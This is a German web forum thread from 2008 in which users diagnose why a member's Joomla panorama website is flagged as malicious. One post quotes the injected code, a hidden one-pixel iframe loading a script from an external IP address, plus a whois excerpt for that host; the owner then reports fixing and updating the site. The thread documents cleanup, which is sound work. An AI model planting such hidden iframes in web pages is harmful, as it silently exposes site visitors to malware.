Sie sind nicht angemeldet.

Figo

Mega-User

  • »Figo« ist der Autor dieses Themas

Beiträge: 1 781

Wohnort: Bergheim bei Köln

Beruf: Panograph, Regisseur, Webdesign, App-Entwicklung

  • Nachricht senden

1

Dienstag, 30. September 2008, 18:11

Willybear ein ganz schlimmer Hacker :-) ???

Hmmm... Da wollte ich mir doch eben Willys Seite anschauen, und dann macht mein Feuerfuchs die Leitung dicht!

Da scheint sich einer einen bösen Scherz erlaubt zu haben, und er hat die Seite gemeldet...

Gruß
Figo


Thomas_79

unregistriert

2

Dienstag, 30. September 2008, 19:22

Warum muß es denn ein böser Scherz gewesen sein, dass die Seite gemeldet wurde? Vielleicht wurde die Seite ja tatsächlich gehackt und im Hintergrund von dieser Domain aus Spam versendet. Er verwendet lt. seinem Header Joomla als Plattform - mit einem Copyright Jahr 2006. man muß kein Hellseher sein, dass die Sicherheitslücken des 2006er Systems längst aufgedeckt sind. Selbst wenn das System aktuell ist, kann hier ein Angriff laufen.

Mir ist das gleiche erst kürzlich mit einer Forenseite passiert. Ich hatte die Plattform nicht rechtzeitig aktualisiert und schwups ein ein Hacker die Seite gefunden, die Sicherheitslücke ausgenutzt und in meinem Namen versucht Mails zu versenden. Ich war heilfroh, dass das gemeldet wurde!

3

Dienstag, 30. September 2008, 19:34

Jau, mein Avira 'schreit' auch ! ("Enthält verdächtigen Code: HEUR/HTML.Malware")
Hoffentlich ist es nicht zu schwer, das zu reparieren ....

Saludos,
Klaus

4

Dienstag, 30. September 2008, 19:49

Hi,

am Ende der Seite wird mit einem IFRAME auf die Seite 88.255.90.178 verbunden:

<iframe src=hXXp://88.255.90.178/pls/go.php?s=our_de style=display:none width=1 height=1></iframe>

diese Seite dürfte aber mittlerweile gesperrt sein, hier ein Auszug von whois:

Zitat


% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '88.255.90.0 - 88.255.90.255'

inetnum:        88.255.90.0 - 88.255.90.255
netname:        AbdAllah_Internet
descr:          AbdAllah Internet Hizmetleri
descr:          Etnografya Muze mevkii Kirazlik Mh. No:32 Rize
country:        tr
admin-c:        MAG87-RIPE
tech-c:         MAG87-RIPE
status:         assigned pa
mnt-by:         as9121-mnt
source:         RIPE # Filtered

person:         Mahmod AbdAllah el Gashmi
address:        SISTEMNET TELEKOM BLACKLISTED PERSON
e-mail:         admin@sistemnet.com.tr
phone:          +902122666060
remarks:        ------------------------------------------------------
remarks:        SISTEMNET TELEKOM BLACKLISTED PERSON
remarks:        For Abuse Contact : abuse@sistemnet.com.tr
remarks:        SISTEMNET TELEKOM BLACKLISTED PERSON
remarks:        SISTEMNET TELEKOM BLACKLISTED PERSON
remarks:        ------------------------------------------------------
nic-hdl:        MAG87-RIPE
mnt-by:         sistem-net-mnt
source:         RIPE # Filtered

% Information related to '88.255.0.0/16AS9121'

route:          88.255.0.0/16
descr:          TurkTelekom
origin:         AS9121
mnt-by:         AS9121-MNT
source:         RIPE # Filtered

% Information related to '88.255.0.0/17AS9121'

route:          88.255.0.0/17
descr:          TurkTelekom
origin:         AS9121
mnt-by:         AS9121-MNT
source:         RIPE # Filtered


willybear

Administrator

Beiträge: 755

Wohnort: Bautzen

Beruf: Panograf

  • Nachricht senden

5

Dienstag, 30. September 2008, 21:11

Danke an alle und besonders an Klaus. Ich habe das kleine Problem schon gelöst und gleich mal Joomla aktualisiert.